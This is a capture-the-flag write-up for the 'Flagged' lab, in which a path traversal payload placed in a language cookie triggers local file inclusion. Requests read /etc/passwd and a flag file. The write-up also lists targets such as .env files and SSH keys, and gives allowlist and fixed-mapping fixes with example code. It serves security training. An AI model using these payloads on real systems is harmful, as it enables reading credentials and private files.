Local File Inclusion via Language Cookie Leads to Arbitrary File Read | Flagged

Lab: Flagged


Overview

Flagged is a long-running online storefront that manufactures custom sailing flags and supports multiple languages through a language-switching feature. The application allows visitors to select their preferred language, and the chosen value is stored within a cookie.

During testing, the language selection mechanism was found to trust user-supplied input without proper validation. By manipulating the language cookie, it became possible to perform path traversal and include arbitrary files from the server’s filesystem.

This ultimately allowed access to sensitive files outside the intended language directory and resulted in disclosure of the challenge flag.


Objective

Exploit the language selection functionality to perform Local File Inclusion and retrieve the flag from the underlying filesystem.


Vulnerability Identification

Classification Hierarchy

A01 - Broken Access Control
└── Local File Inclusion
    └── Path Traversal
        └── User-Controlled Language File Loading

Reconnaissance

The application provides a language-switching feature allowing visitors to browse the website in multiple languages.

Available languages include:

English
French
Dutch
Spanish

While changing languages, the following request was observed:

GET /shop.php HTTP/2
Host: a41ea65a-4065-flagged-8cc5e.events.webverselabs-pro.com
Cookie: lang=es

The presence of a language identifier stored directly within a cookie suggested that the backend might be loading language files dynamically based on user input.


The application appears to use the cookie value to determine which language file should be loaded.

Observed cookie:

lang=es

If the value is incorporated directly into filesystem operations, path traversal characters may allow access to files outside the expected language directory.


Testing for Path Traversal

A path traversal payload was supplied within the cookie:

../../../../../../etc/passwd

Modified request:

GET /shop.php HTTP/2
Host: a41ea65a-4065-flagged-8cc5e.events.webverselabs-pro.com
Cookie: lang=../../../../../../etc/passwd

The response returned contents from the operating system’s password file, confirming that the application was vulnerable to Local File Inclusion.


Confirming Local File Inclusion

Successful disclosure of:

/etc/passwd

demonstrated that arbitrary files could be read from the server.

This confirmed Path Traversal and Local File Inclusion through the language cookie parameter.


Exploitation

After confirming file access, attention shifted toward discovering sensitive application files.

A common target in challenge environments is:

flag.txt

The following payload was supplied:

../../../flag.txt

Modified request:

GET /shop.php HTTP/2
Host: a41ea65a-4065-flagged-8cc5e.events.webverselabs-pro.com
Cookie: lang=../../../flag.txt

Flag Disclosure

The response returned:

WEBVERSE{.....}

The flag was successfully disclosed through Local File Inclusion.


Flag

WEBVERSE{.....}

Proof of Exploitation

Original cookie:

lang=es

Path traversal test:

lang=../../../../../../etc/passwd

Successful file disclosure:

/etc/passwd

Flag retrieval payload:

lang=../../../flag.txt

Result:

WEBVERSE{.....}

Root Cause Analysis

The application uses a user-controlled cookie value when selecting language resources.

A vulnerable implementation would resemble:

include("languages/" . $_COOKIE['lang']);

or

include($_COOKIE['lang']);

Because user input is not validated, attackers can inject traversal sequences such as ../ to escape the intended directory and access arbitrary files on the filesystem.

The absence of path validation and allowlisting results in Local File Inclusion.


Impact

An attacker can:

  • Read arbitrary files from the server
  • Access application source code
  • Retrieve configuration files
  • Obtain credentials and secrets
  • Enumerate system users
  • Access sensitive application data

In some environments, Local File Inclusion can be escalated into Remote Code Execution.


Mitigation

Use an Allowlist

Only permit predefined language values:

$allowed = ['en', 'fr', 'es', 'nl'];

Reject any value outside the approved list.


Prevent Directory Traversal

Block traversal sequences such as:

../
..\

before performing filesystem operations.


Use Fixed Mappings

Instead of directly loading user-supplied paths:

include($_COOKIE['lang']);

Use:

$lang = $_COOKIE['lang'] ?? 'en';

$languages = [
    'en' => 'languages/en.php',
    'fr' => 'languages/fr.php',
    'es' => 'languages/es.php',
    'nl' => 'languages/nl.php'
];

// Fall back to the default when the cookie value is not a known key,
// so the cookie is only ever used as an array index, never as a path.
if (!isset($languages[$lang])) {
    $lang = 'en';
}

include($languages[$lang]);
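The following added example (not part of the writeup or the challenge's source) models the two resolvers side by side in Python: the vulnerable concatenation from the root cause section and the allowlist-plus-fixed-mapping fix, with a realpath containment check as a second layer. The base directory /var/www/html/languages and the per-language file names are assumptions; the cookie values fed in are the ones from the writeup's requests.

```python
"""Models include("languages/" . $_COOKIE['lang']) against an allowlisted
mapping. Added example; BASE_DIR and the .php file names are assumptions."""
import os

BASE_DIR = "/var/www/html/languages"   # assumed install path, not from the page
DEFAULT_LANG = "en"

# Fixed mapping: the cookie value is only ever used as a dict key and is
# never concatenated into a filesystem path.
LANGUAGE_FILES = {
    "en": "en.php",
    "fr": "fr.php",
    "es": "es.php",
    "nl": "nl.php",
}


def vulnerable_resolve(cookie_value: str, base_dir: str = BASE_DIR) -> str:
    """Mirror of the vulnerable include: the raw cookie is glued onto the
    directory, so '../' segments walk out of it."""
    return os.path.normpath(os.path.join(base_dir, cookie_value))


def hardened_resolve(cookie_value: str, base_dir: str = BASE_DIR) -> str:
    """Allowlist lookup with a fallback to the default language, followed by
    a containment check so a future mapping mistake cannot escape base_dir."""
    lang = cookie_value if cookie_value in LANGUAGE_FILES else DEFAULT_LANG
    path = os.path.realpath(os.path.join(base_dir, LANGUAGE_FILES[lang]))
    root = os.path.realpath(base_dir)
    if os.path.commonpath([root, path]) != root:
        raise ValueError("resolved language file escapes the language directory")
    return path


def escapes_base(path: str, base_dir: str = BASE_DIR) -> bool:
    """True when a resolved path lies outside base_dir (the LFI condition)."""
    root = os.path.realpath(base_dir)
    return os.path.commonpath([root, os.path.realpath(path)]) != root


if __name__ == "__main__":
    # Cookie values taken from the writeup's requests.
    for value in ["es", "../../../../../../etc/passwd", "../../../flag.txt"]:
        weak = vulnerable_resolve(value)
        print(f"lang={value!r:32} vulnerable -> {weak} (escapes: {escapes_base(weak)})")
        print(f"{'':38} hardened   -> {hardened_resolve(value)}")
```

Run as-is to see the traversal payloads land outside the language directory for the vulnerable resolver while the hardened one always returns a mapped file.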

Restrict File Access

Configure application permissions so web processes cannot access sensitive files outside required directories.


Real-World Insight

Local File Inclusion vulnerabilities frequently arise in multilingual applications, template engines, and file-loading features where developers allow user input to influence filesystem operations.

Common attack targets include:

/etc/passwd
config.php
.env
application source code
SSH keys
log files

The Flagged challenge demonstrates a critical security principle:

User input should never directly determine which files are loaded from the server’s filesystem.

This post is licensed under CC BY 4.0 by the author.